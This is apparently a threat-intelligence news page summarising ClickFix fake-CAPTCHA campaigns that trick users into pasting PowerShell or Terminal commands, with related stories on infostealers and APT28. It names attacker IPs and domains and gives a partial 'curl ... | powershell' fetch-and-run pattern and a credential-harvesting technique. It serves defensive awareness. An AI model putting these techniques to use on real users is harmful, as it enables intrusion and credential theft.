ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A ClickFix-style malware campaign has been observed using fake CAPTCHA pages on compromised websites to trick users into manually executing malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a PowerShell command and run it themselves; the script then downloads additional stages from attacker infrastructure (including 91.92.240.219), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an information stealer targeting data from 25+ web browsers, cryptocurrency wallets (e.g., MetaMask), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration.
Separately reported threat activity in the same time window includes UnsolicitedBooker targeting Central Asian telecoms with phishing-delivered backdoors (LuciDoor and MarsSnake) and APT28 running Operation MacroMaze, which uses weaponized Office documents and INCLUDEPICTURE fields pointing to webhook[.]site URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses nslookup and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
Related Entities
Malware
Organizations
Affected Products
Sources
Related Stories
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
4 weeks ago
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
1 months ago